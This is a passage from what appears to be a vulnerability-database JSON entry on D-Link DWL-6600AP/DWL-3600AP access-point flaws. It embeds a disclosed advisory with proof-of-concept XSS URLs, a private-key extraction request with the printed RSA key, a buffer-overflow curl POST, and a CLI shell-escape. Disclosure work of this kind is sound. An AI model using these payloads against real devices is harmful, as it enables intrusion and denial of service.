wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE-----
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0914",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.4,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-6600ap",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "4.2.0.14"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14336",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14336",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 1.7,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.1,
"id": "CNVD-2019-39563",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-146272",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14336",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-14336",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14336",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14336",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-39563",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1631",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146272",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated dump of all of the config files through a certain admin.cgi?action= insecure HTTP request. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Information may be obtained. D-Link DWL-6600AP is a dual-band unified management wireless access point device designed for enterprise environments. D-Link DWL-3600AP is a single-frequency unified management wireless access point device designed for enterprise environments. \n\nD-Link DWL-6600AP and DWL-3600AP 4.2.0.14 have configuration file dump vulnerability. A security vulnerability exists in D-Link 6600-AP and DWL-3600AP version 4.2.0.14. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to\nthe reboot of the AP\n 4. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14335 - Post-authenticated Denial of service leading to\nthe reboot of the AP\n 6. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee\nHk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o\nBioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B\nvsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t\n7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c\nunyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk\n1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6\nJ8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14\nyRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z\n0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc\nfmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB\ni5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb\ndAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ\nOztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ\nVuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9\nJ3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr\nH975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw\nuF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy\nyGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd\npagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co\npaZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8\n1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm\nfPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS\nokObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px\nbgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY\n-----END RSA PRIVATE KEY-----\n-----BEGIN CERTIFICATE-----\nMIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx\nMC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp\nbmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL\nMAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU\nMBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG\nA1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE\nCBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu\nOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB\nBQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp\nwRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC\nI+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW\n2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK\nYwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N\n29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B\nAQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS\n7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME\n9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5\nbeF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE\n45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef\nMjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==\n-----END CERTIFICATE-----\n\n### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14336"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2019-14336",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-39563",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146272",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"id": "VAR-201908-0914",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
}
],
"trust": 1.4935897333333332
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
}
]
},
"last_update_date": "2024-11-23T21:52:00.555000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP configuration file dump vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/189045"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95741"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
